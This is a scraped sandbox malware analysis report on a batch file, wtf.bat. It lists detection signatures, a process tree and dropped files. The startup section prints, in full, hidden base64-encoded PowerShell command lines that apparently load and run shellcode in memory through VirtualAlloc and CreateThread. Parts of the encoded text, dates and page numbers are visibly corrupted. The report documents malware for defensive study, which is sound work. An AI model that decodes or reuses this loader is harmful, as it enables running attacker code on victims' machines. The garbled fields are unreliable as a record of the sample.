ID: Sample Name: wtf.bat Cookbook: default.jbs Time: 18:32:35 Date: 19/05/2018 Version:

Size: px

Start display at page:

Download "ID: Sample Name: wtf.bat Cookbook: default.jbs Time: 18:32:35 Date: 19/05/2018 Version:"

Leonard Casey
5 years ago
Views:

1 ID: 6036 Sample Name: wtf.bat Cookbook: default.jbs Time: 1:32:35 Date: 19/05/201 Version:

2 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Signature Overview Networking: Data Obfuscation: Spreading: System Summary: HIPS / PFW / Operating System Protection Evasion: Anti Debugging: Malware Analysis System Evasion: Hooking and other Techniques for Hiding and Protection: Language, Device and Operating System Detection: Behavior Graph Simulations Behavior and APIs Antivirus Detection Initial Sample Dropped Files Unpacked PE Files Domains URLs Yara Overview Initial Sample PCAP (Network Traffic) Dropped Files Memory Dumps Unpacked PEs Joe Sandbox View / Context IPs Domains ASN Dropped Files Screenshots Startup Created / dropped Files Contacted Domains/Contacted IPs Contacted Domains Contacted IPs Static File Info General File Icon Network Behavior Code Manipulations Statistics Behavior System Behavior Analysis Process: cmd.exe PID: 3464 Parent PID: 302 Copyright Joe Security LLC 201 Page 2 of

3 General File Activities File Read Analysis Process: powershell.exe PID: 3492 Parent PID: 3464 General File Activities File Read Analysis Process: powershell.exe PID: 3544 Parent PID: 3492 General File Activities File Created File Deleted File Written File Read Analysis Process: csc.exe PID: 3596 Parent PID: 3544 General Disassembly Code Analysis Copyright Joe Security LLC 201 Page 3 of 21

Analysis Report Overview General Information Joe Sandbox Version: 22.0.0 Analysis ID: 6036 Start time: 1:32:35 Joe Sandbox Product: CloudBasic Start date: 19.05.

4 Analysis Report Overview General Information Joe Sandbox Version: Analysis ID: 6036 Start time: 1:32:35 Joe Sandbox Product: CloudBasic Start date: Overall analysis duration: Hypervisor based Inspection enabled: Report type: Sample file name: Cookbook file name: 0h 10m 57s light wtf.bat default.jbs Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java ) Number of analysed new started processes analysed: 6 Number of new started drivers analysed: 0 Number of existing processes analysed: 0 Number of existing drivers analysed: 0 Number of injected processes analysed: 0 Technologies Analysis stop reason: Detection: Classification: HCA enabled EGA enabled HDC enabled Timeout MAL mal4.evad.winbat@7/6@0/0 HCA Information: Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0 EGA Information: HDC Information: Cookbook Comments: Warnings: Failed Failed Adjust boot time Correcting counters for adjusted boot time Found application associated with file extension:.bat Show All Exclude process from analysis (whitelisted): conhost.exe, dllhost.exe Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. Skipping Hybrid Code Analysis (implementation is based on Java,.Net, VB or Delphi, or parses a document) for: powershell.exe, powershell.exe, csc.exe Detection Strategy Score Range Reporting Detection Threshold Report FP / FN Copyright Joe Security LLC 201 Page 4 of 21

5 Confidence Strategy Score Range Further Analysis Required? Threshold Confidence Classification Ransomware Miner Spreading malicious malicious malicious Evader Phishing suspicious suspicious suspicious clean clean clean Exploiter Banker Spyware Trojan / Bot Adware Copyright Joe Security LLC 201 Page 5 of 21

6 Signature Overview Networking Data Obfuscation Spreading System Summary HIPS / PFW / Operating System Protection Evasion Anti Debugging Malware Analysis System Evasion Hooking and other Techniques for Hiding and Protection Language, Device and Operating System Detection Click to jump to signature section Networking: Urls found in memory or binary data Data Obfuscation: Compiles C# or VB.Net code Spreading: Enumerates the file system System Summary: Very long command line found Classification label Creates files inside the user directory Creates temporary files Executes batch files Found command line output Parts of this applications are using the.net runtime (Probably coded in C#) Reads ini files Reads software policies Spawns processes Uses an in-process (OLE) Automation server Uses Microsoft Silverlight Uses new MSVCR Dlls Binary contains paths to debug symbols HIPS / PFW / Operating System Protection Evasion: Encrypted powershell cmdline option found Very long cmdline option found, this is very uncommon (may be encrypted or packed) May try to detect the Windows Explorer process (often used for injection) Anti Debugging: Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation)) Enables debug privileges Copyright Joe Security LLC 201 Page 6 of 21

Creates guard pages, often used to prevent reverse engineering and debugging Malware Analysis System Evasion: Contains long sleeps (>= 3 min) Enumerates the file system May sleep (evasive loops) to

7 Creates guard pages, often used to prevent reverse engineering and debugging Malware Analysis System Evasion: Contains long sleeps (>= 3 min) Enumerates the file system May sleep (evasive loops) to hinder dynamic analysis Queries a list of all running processes Hooking and other Techniques for Hiding and Protection: Disables application error messsages (SetErrorMode) Language, Device and Operating System Detection: Queries the installation date of Windows Queries the volume information (name, serial number etc) of a device Queries the cryptographic machine GUID Behavior Graph Behavior Graph ID: 6036 Sample: wtf.bat Startdate: 19/05/201 Architecture: WINDOWS Score: 4 Legend: Process Signature Created File DNS/IP Info Is Dropped Hide Legend Very long command line found Encrypted powershell cmdline option found started Is Windows Process Number of created Registry Values cmd.exe Number of created Files Visual Basic Delphi Java Very long command line found Encrypted powershell cmdline option found started.net C# or VB.NET C, C++ or other language powershell.exe Is malicious 6 Very long command line found Encrypted powershell cmdline option found started powershell.exe 13 started csc.exe Simulations Behavior and APIs Copyright Joe Security LLC 201 Page 7 of 21

8 Time Type Description 1:33:4 API Interceptor 2x Sleep call for process: powershell.exe modified 1:33:53 API Interceptor 1x Sleep call for process: csc.exe modified Antivirus Detection Initial Sample No Antivirus matches Dropped Files No Antivirus matches Unpacked PE Files No Antivirus matches Domains No Antivirus matches URLs No Antivirus matches Yara Overview Initial Sample No yara matches PCAP (Network Traffic) No yara matches Dropped Files No yara matches Memory Dumps No yara matches Unpacked PEs No yara matches Joe Sandbox View / Context IPs No context Domains Copyright Joe Security LLC 201 Page of 21

$No context ASN No context Dropped Files No context Screenshots Startup System is w7 cmd.exe (PID: 3464 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\Desktop\wtf.$

9 No context ASN No context Dropped Files No context Screenshots Startup System is w7 cmd.exe (PID: 3464 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\Desktop\wtf.bat' ' MD5: AD7B9C1403B52BC532FBA594342B9) powershell.exe (PID: 3492 cmdline: powershell -nop -win Hidden -noni -enc JAAxACAAPQAgACcAJABjACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAGAcgB0A CgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgA FYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1A GkAbgB0ACAAZgBsAEEAbABsAGAYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwA GAcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQA HQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpA G4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByA CAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAGAbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwA FQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhA HQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByA Copyright Joe Security LLC 201 Page 9 of 21

10 GMALAAgAHUAaQBuAHQAIABjAGAdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpA HQAaQBvAG4AIAAkAGMAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvA G4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAcwBjACAAPQAgADAAeABmAGMALAAwAHgAZQA4A CwAMAB4ADgAMgAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADAALAAwAHgAOAA5ACwAMAB4AGUANQAsADAAeAAzADEALAA wahgaywawacwamab4adyanaasadaaeaa4agialaawahganqawacwamab4admamaasadaaeaa4agialaawahganqayacwamab4adaaywasadaaeaa4agialaa wahganqayacwamab4adeanaasadaaeaa4agialaawahganwayacwamab4adiaoaasadaaeaawagyalaawahgayga3acwamab4adqayqasadaaeaayadyalaa wahgamwaxacwamab4agyazgasadaaeabhagmalaawahgamwbjacwamab4adyamqasadaaeaa3agmalaawahgamaayacwamab4adiaywasadaaeaayadaalaa wahgaywaxacwamab4agmazgasadaaeaawagqalaawahgamaaxacwamab4agmanwasadaaeabladialaawahgazgayacwamab4aduamgasadaaeaa1adcalaa wahgaoabiacwamab4aduamgasadaaeaaxadaalaawahgaoabiacwamab4adqayqasadaaeaazagmalaawahgaoabiacwamab4adqaywasadaaeaaxadealaa wahganwa4acwamab4aguamwasadaaeaa0adgalaawahgamaaxacwamab4agqamqasadaaeaa1adealaawahgaoabiacwamab4aduaoqasadaaeaayadaalaa wahgamaaxacwamab4agqamwasadaaeaa4agialaawahganaa5acwamab4adeaoaasadaaeabladmalaawahgamwbhacwamab4adqaoqasadaaeaa4agialaa wahgamwa0acwamab4adgaygasadaaeaawadealaawahgazaa2acwamab4admamqasadaaeabmagyalaawahgayqbjacwamab4agmamqasadaaeabjagyalaa wahgamabkacwamab4adaamqasadaaeabjadcalaawahgamwa4acwamab4aguamaasadaaeaa3adualaawahgazga2acwamab4adaamwasadaaeaa3agqalaa wahgazga4acwamab4admaygasadaaeaa3agqalaawahgamga0acwamab4adcanqasadaaeabladqalaawahganqa4acwamab4adgaygasadaaeaa1adgalaa wahgamga0acwamab4adaamqasadaaeabkadmalaawahganga2acwamab4adgaygasadaaeaawagmalaawahganabiacwamab4adgaygasadaaeaa1adgalaa wahgamqbjacwamab4adaamqasadaaeabkadmalaawahgaoabiacwamab4adaanaasadaaeaa4agialaawahgamaaxacwamab4agqamaasadaaeaa4adkalaa wahganaa0acwamab4adianaasadaaeaayadqalaawahganqbiacwamab4aduaygasadaaeaa2adealaawahganqa5acwamab4aduayqasadaaeaa1adealaa wahgazgbmacwamab4aguamaasadaaeaa1agyalaawahganqbmacwamab4aduayqasadaaeaa4agialaawahgamqayacwamab4aguaygasadaae AA4AGQALAAwAHgANQBkACwAMAB4ADYAOAAsADAAeAAzADMALAAwAHgAMwAyACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4ADcANwAsADAAe AA3ADMALAAwAHgAMwAyACwAMAB4ADUAZgAsADAAeAA1ADQALAAwAHgANgA4ACwAMAB4ADQAYwAsADAAeAA3ADcALAAwAHgAMgA2ACwAMAB4ADAANwAsADAAe ABmAGYALAAwAHgAZAA1ACwAMAB4AGIAOAAsADAAeAA5ADAALAAwAHgAMAAxACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMgA5ACwAMAB4AGMANAAsADAAe AA1ADQALAAwAHgANQAwACwAMAB4ADYAOAAsADAAeAAyADkALAAwAHgAOAAwACwAMAB4ADYAYgAsADAAeAAwADAALAAwAHgAZgBmACwAMAB4AGQ ANQAsADAAeAA2AGEALAAwAHgAMABhACwAMAB4ADYAOAAsADAAeABjADAALAAwAHgAYQA4ACwAMAB4ADAAMQAsADAAeABhAGMALAAwAHgANgA4ACwAMAB4ADA AMgAsADAAeAAwADAALAAwAHgAMAAxACwAMAB4AGIAYQAsADAAeAA4ADkALAAwAHgAZQA2ACwAMAB4ADUAMAAsADAAeAA1ADAALAAwAHgANQAwACwAMAB4ADU AMAAsADAAeAA0ADAALAAwAHgANQAwACwAMAB4ADQAMAAsADAAeAA1ADAALAAwAHgANgA4ACwAMAB4AGUAYQAsADAAeAAwAGYALAAwAHgAZABmA CwAMAB4AGUAMAAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADkANwAsADAAeAA2AGEALAAwAHgAMQAwACwAMAB4ADUANgAsADAAeAA1ADcALAAwAHgANgA4A CwAMAB4ADkAOQAsADAAeABhADUALAAwAHgANwA0ACwAMAB4ADYAMQAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA0A CwAMAB4ADAAYwAsADAAeABmAGYALAAwAHgANABlACwAMAB4ADAAOAAsADAAeAA3ADUALAAwAHgAZQBjACwAMAB4ADYAOAAsADAAeABmADAALAAwAHgAYgA1A CwAMAB4AGEAMgAsADAAeAA1ADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA2AGEALAAwAHgAMAAwACwAMAB4ADYAYQAsADAAeAAwADQALAA wahganqa2acwamab4aduanwasadaaeaa2adgalaawahgamaayacwamab4agqaoqasadaaeabjadgalaawahganqbmacwamab4agyazgasadaaeabkadualaa wahgaoabiacwamab4admangasadaaeaa2agealaawahganaawacwamab4adyaoaasadaaeaawadaalaawahgamqawacwamab4adaamaasadaae AAwADAALAAwAHgANQA2ACwAMAB4ADYAYQAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4ADUAOAAsADAAeABhADQALAAwAHgANQAzACwAMAB4AGU ANQAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADkAMwAsADAAeAA1ADMALAAwAHgANgBhACwAMAB4ADAAMAAsADAAeAA1ADYALAAwAHgANQAzACwAMAB4ADU ANwAsADAAeAA2ADgALAAwAHgAMAAyACwAMAB4AGQAOQAsADAAeABjADgALAAwAHgANQBmACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAMAAxACwAMAB4AGM AMwAsADAAeAAyADkALAAwAHgAYwA2ACwAMAB4ADcANQAsADAAeABlAGUALAAwAHgAYwAzADsAJABzAGkAegBlACAAPQAgADAAeAAxADAAMAAwADsAaQBmACA AKAAkAHMAYwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABzAGkAegBlACAAPQAgACQAcwBjAC4ATABlAG4AZwB0AGgAfQA7ACQ AeAA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAHMAaQB6AGUALAAwAHgANAAwACkAOwBmAGAcgAgACg AJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHMAYwAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACg AWwBJAG4AdABQAHQAcgBdACgAJAB4AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJABzAGMAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEM AcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAHgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGU AcAAgADYAMAB9ADsAJwA7ACQAZwBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAGAbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4 AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkADE AKQApADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAHgAOAA2ACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGU AbQBSAGAbwB0ACAAKwAgACIAXABzAHkAcwB3AGAdwA2ADQAXABXAGkAbgBkAGAdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHc AZQByAHMAaABlAGwAbAAiADsAJABjAG0AZAAgAD0AIAAiAC0AbgBvAHAAIAAtAG4AbwBuAGkAIAAtAGUAbgBjACAAIgA7AGkAZQB4ACAAIgAmACAAJAB4ADg ANgAgACQAYwBtAGQAIAAkAGcAcQAiAH0AZQBsAHMAZQB7ACQAYwBtAGQAIAA9ACAAIgAtAG4AbwBwACAALQBuAGAbgBpACAALQBlAG4AYwAiADsAaQBlAHg AIAAiACYAIABwAGAdwBlAHIAcwBoAGUAbABsACAAJABjAG0AZAAgACQAZwBxACIAOwB9AA== MD5: 92F44E405DB16AC55D97E3BFE3B132FA) powershell.exe (PID: 3544 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop -noni -enc JABjACAAPQAgACcAWwBEAGwAbABJAG0AcA BvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUA B0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAGAYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQ AsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAGAdABlAGMAdAApADsA WwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUA cgbuacaasqbuahqauab0ahiaiabdahiazqbhahqazqbuaggacgblageazaaoaekabgb0afaadabyacaababwafqaaabyaguayqbkaeeadab0ahiaaqbiahua dablahmalaagahuaaqbuahqaiabkahcauwb0ageaywbrafmaaqb6agualaagaekabgb0afaadabyacaababwafmadabhahiadabbagqazabyaguacwbzacwa IABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4A dabqahqacgagagwacabuaggacgblageazabjagqakqa7afsarabsagwasqbtahaabwbyahqakaaiag0acwb2agmacgb0ac4azabsagwaigapaf0acab1agia babpagmaiabzahqayqb0agkaywagaguaeab0aguacgbuacaasqbuahqauab0ahiaiabtaguabqbzaguadaaoaekabgb0afaadabyacaazablahmadaasacaa dqbpag4adaagahmacgbjacwaiab1agkabgb0acaaywbvahuabgb0ackaowanadsajab3acaapqagaeeazabkac0avab5ahaazqagac0abqblag0aygblahia RABlAGYAaQBuAGkAdABpAGAbgAgACQAYwAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYA dqbuagmadabpagabgbzacaalqbwageacwbzahqaaabyahuaowbbaeiaeqb0aguawwbdaf0aowbbaeiaeqb0aguawwbdaf0ajabzagmaiaa9ac AAMAB4AGYAYwAsADAAeABlADgALAAwAHgAOAAyACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAMAAsADAAeAA4ADkALAAw AHgAZQA1ACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgANgA0ACwAMAB4ADgAYgAsADAAeAA1ADAALAAwAHgAMwAwACwAMAB4ADgAYgAsADAAeA A1ADIALAAwAHgAMABjACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQA0ACwAMAB4ADgAYgAsADAAeAA3ADIALAAwAHgAMgA4ACwAMAB4ADAAZgAsADAAeA BiADcALAAwAHgANABhACwAMAB4ADIANgAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4AGEAYwAsADAAeAAzAGMALAAwAHgANgAxACwAMAB4ADcA YwAsADAAeAAwADIALAAwAHgAMgBjACwAMAB4ADIAMAAsADAAeABjADEALAAwAHgAYwBmACwAMAB4ADAAZAAsADAAeAAwADEALAAwAHgAYwA3AC wamab4aguamgasadaaeabmadialaawahganqayacwamab4aduanwasadaaeaa4agialaawahganqayacwamab4adeamaasadaaeaa4agialaaw AHgANABhACwAMAB4ADMAYwAsADAAeAA4AGIALAAwAHgANABjACwAMAB4ADEAMQAsADAAeAA3ADgALAAwAHgAZQAzACwAMAB4ADQAOAAsADAAeA AwADEALAAwAHgAZAAxACwAMAB4ADUAMQAsADAAeAA4AGIALAAwAHgANQA5ACwAMAB4ADIAMAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgA YgAsADAAeAA0ADkALAAwAHgAMQA4ACwAMAB4AGUAMwAsADAAeAAzAGEALAAwAHgANAA5ACwAMAB4ADgAYgAsADAAeAAzADQALAAwAHgAOABiAC wamab4adaamqasadaaeabkadyalaawahgamwaxacwamab4agyazgasadaaeabhagmalaawahgaywaxacwamab4agmazgasadaaeaawagqalaaw AHgAMAAxACwAMAB4AGMANwAsADAAeAAzADgALAAwAHgAZQAwACwAMAB4ADcANQAsADAAeABmADYALAAwAHgAMAAzACwAMAB4ADcAZAAsADAAeA BmADgALAAwAHgAMwBiACwAMAB4ADcAZAAsADAAeAAyADQALAAwAHgANwA1ACwAMAB4AGUANAAsADAAeAA1ADgALAAwAHgAOABiACwAMAB4ADUA OAAsADAAeAAyADQALAAwAHgAMAAxACwAMAB4AGQAMwAsADAAeAA2ADYALAAwAHgAOABiACwAMAB4ADAAYwAsADAAeAA0AGIALAAwAHgAOABiAC wamab4aduaoaasadaaeaaxagmalaawahgamaaxacwamab4agqamwasadaaeaa4agialaawahgamaa0acwamab4adgaygasadaaeaawadealaaw AHgAZAAwACwAMAB4ADgAOQAsADAAeAA0ADQALAAwAHgAMgA0ACwAMAB4ADIANAAsADAAeAA1AGIALAAwAHgANQBiACwAMAB4ADYAMQAsADAAeA A1ADkALAAwAHgANQBhACwAMAB4ADUAMQAsADAAeABmAGYALAAwAHgAZQAwACwAMAB4ADUAZgAsADAAeAA1AGYALAAwAHgANQBhACwAMAB4ADgA YgAsADAAeAAxADIALAAwAHgAZQBiACwAMAB4ADgAZAAsADAAeAA1AGQALAAwAHgANgA4ACwAMAB4ADMAMwAsADAAeAAzADIALAAwAHgAMAAwAC wamab4adaamaasadaaeaa2adgalaawahganwa3acwamab4adcamwasadaaeaazadialaawahganqbmacwamab4aduanaasadaaeaa2adgalaaw AHgANABjACwAMAB4ADcANwAsADAAeAAyADYALAAwAHgAMAA3ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAYgA4ACwAMAB4ADkAMAAsADAAeA AwADEALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAyADkALAAwAHgAYwA0ACwAMAB4ADUANAAsADAAeAA1ADAALAAwAHgANgA4ACwAMAB4ADIA OQAsADAAeAA4ADAALAAwAHgANgBiACwAMAB4ADAAMAAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADYAYQAsADAAeAAwAGEALAAwAHgANgA4AC wamab4agmamaasadaaeabhadgalaawahgamaaxacwamab4ageaywasadaaeaa2adgalaawahgamaayacwamab4adaamaasadaaeaawadealaaw AHgAYgBhACwAMAB4ADgAOQAsADAAeABlADYALAAwAHgANQAwACwAMAB4ADUAMAAsADAAeAA1ADAALAAwAHgANQAwACwAMAB4ADQAMAAsADAAeA A1ADAALAAwAHgANAAwACwAMAB4ADUAMAAsADAAeAA2ADgALAAwAHgAZQBhACwAMAB4ADAAZgAsADAAeABkAGYALAAwAHgAZQAwACwAMAB4AGYA ZgAsADAAeABkADUALAAwAHgAOQA3ACwAMAB4ADYAYQAsADAAeAAxADAALAAwAHgANQA2ACwAMAB4ADUANwAsADAAeAA2ADgALAAwAHgAOQA5AC wamab4ageanqasadaaeaa3adqalaawahgangaxacwamab4agyazgasadaaeabkadualaawahgaoaa1acwamab4agmamaasadaaeaa3adqalaaw AHgAMABjACwAMAB4AGYAZgAsADAAeAA0AGUALAAwAHgAMAA4ACwAMAB4ADcANQAsADAAeABlAGMALAAwAHgANgA4ACwAMAB4AGYAMAAsADAAeA BiADUALAAwAHgAYQAyACwAMAB4ADUANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADYAYQAsADAAeAAwADAALAAwAHgANgBhACwAMAB4ADAA NAAsADAAeAA1ADYALAAwAHgANQA3ACwAMAB4ADYAOAAsADAAeAAwADIALAAwAHgAZAA5ACwAMAB4AGMAOAAsADAAeAA1AGYALAAwAHgAZgBmAC wamab4agqanqasadaaeaa4agialaawahgamwa2acwamab4adyayqasadaaeaa0adaalaawahganga4acwamab4adaamaasadaaeaaxadaalaaw Copyright Joe Security LLC 201 Page 10 of 21

11 cleanup AHgAMAAwACwAMAB4ADAAMAAsADAAeAA1ADYALAAwAHgANgBhACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgANQA4ACwAMAB4AGEANAAsADAAeA A1ADMALAAwAHgAZQA1ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOQAzACwAMAB4ADUAMwAsADAAeAA2AGEALAAwAHgAMAAwACwAMAB4ADUA NgAsADAAeAA1ADMALAAwAHgANQA3ACwAMAB4ADYAOAAsADAAeAAwADIALAAwAHgAZAA5ACwAMAB4AGMAOAAsADAAeAA1AGYALAAwAHgAZgBmAC wamab4agqanqasadaaeaawadealaawahgaywazacwamab4adiaoqasadaaeabjadyalaawahganwa1acwamab4aguazqasadaaeabjadmaowak AHMAaQB6AGUAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAcwBjAC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAHMAaQB6 AGUAIAA9ACAAJABzAGMALgBMAGUAbgBnAHQAaAB9ADsAJAB4AD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAGAYwAoADAALAAwAHgAMQ AwADAAMAAsACQAcwBpAHoAZQAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAcwBjAC4ATABlAG4AZwB0AGgALQ AxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAHgALgBUAGASQBuAHQAMwAyACgAKQArACQAaQ ApACwAIAAkAHMAYwBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAeAAsADAA LAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwA= MD5: 92F44E405DB16AC55D97E3BFE3B132FA) csc.exe (PID: 3596 cmdline: 'C:\Windows\Microsoft.NET\Framework\v \csc.exe' /noconfig MD5: 0A1C1BDCB030222A0B0A652B2C9DD) Created / dropped Files C:\Users\user\AppData\Local\Temp\onkbqua.0.cs Process: File Type: Size (bytes): 557 Entropy (bit): Encrypted: MD5: SHA1: SHA-256: SHA-512: Malicious: Reputation: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe UTF- Unicode (with BOM) text, with very long lines C34DAA5F6F2ECE2DFC07119EE F26A4A451A560E93CB7736F5B C B240A9BB4F72D6522E19FA40B9C6FA94C1BD6DC7B715F94E A5DC 34169FC9FB0CD231C45EFCD22EC1BC659EF513E73BC4C7BCB91CA1D5129A1A149E9F75297ACB495E52FF04D 75E6E121232DBC E41B63F10AA3E1D6BD low C:\Users\user\AppData\Local\Temp\onkbqua.cmdline Process: File Type: Size (bytes): 327 Entropy (bit): Encrypted: MD5: SHA1: SHA-256: SHA-512: Malicious: Reputation: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe UTF- Unicode (with BOM) text, with very long lines, with no line terminators 6D04FDAE432CFC7221FB7A4B7242E4 6607DCFBB91724E3BAD056BDBDD775C57AB11DB B6AD2760D27B37F390D2B930A75EACA362F5E15995A0E9631A0C7992B BAF4D26F0D99A95DDA67D6FE16CC6D06604E4B1CF260C93FB7507D4B D13F1341BAE99C13E2A3 0AD A1E17A0CE931E52AC59A low C:\Users\user\AppData\Local\Temp\onkbqua.out Process: File Type: Size (bytes): 154 C:\Windows\Microsoft.NET\Framework\v \csc.exe ASCII text, with CRLF line terminators Entropy (bit): Encrypted: MD5: SHA1: SHA-256: SHA-512: Malicious: Reputation: F66EE7F06DDB2C5B99B505F0BA4D202 33C6B2DE1BC47C6F5DE16096DC96EA00171F5A 1C24532FE4D9F94E09BA40E456F9019BD49C2F3CD4DD155AE06BDDF339F45BE 641B10FB4FBE04457A49079F7017A91C6A1F59A9CD3F031DB7E34D0969B11FE59C3E945C0E A 46F74E2C2E74797ECFDBFECBEAD low 